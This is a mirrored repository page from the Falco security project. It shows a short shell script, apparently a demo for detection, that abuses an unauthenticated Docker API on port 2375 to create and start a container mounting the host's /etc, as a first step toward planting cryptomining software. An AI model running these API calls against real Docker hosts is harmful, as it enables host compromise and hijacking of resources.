mirror of
				https://github.com/falcosecurity/falco.git
				synced 2025-10-26 14:43:51 +00:00 
			
		
		
		
	An example showing how an overly permissive container environment can be exploited to install and run cryptomining software on a host system.
		
			
				
	
	
		
			15 lines
		
	
	
		
			538 B
		
	
	
	
		
			Bash
		
	
	
	
	
	
			
		
		
	
	
			15 lines
		
	
	
		
			538 B
		
	
	
	
		
			Bash
		
	
	
	
	
	
| #!/bin/sh
 | |
| 
 | |
| echo "Pulling alpine:latest image to docker-in-docker instance"
 | |
| curl -X POST 'http://localhost:2375/images/create?fromImage=alpine&tag=latest'
 | |
| 
 | |
| echo "Creating container mounting /etc from host-machine"
 | |
| curl -H 'Content-Type: application/json' -d @docker123321-mysql-container.json -X POST 'http://localhost:2375/containers/create?&name=docker123321-mysql'
 | |
| 
 | |
| echo "Running container mounting /etc from host-machine"
 | |
| curl -H 'Content-Type: application/json' -X POST 'http://localhost:2375/containers/docker123321-mysql/start'
 | |
| 
 | |
| 
 | |
| 
 | |
| 
 |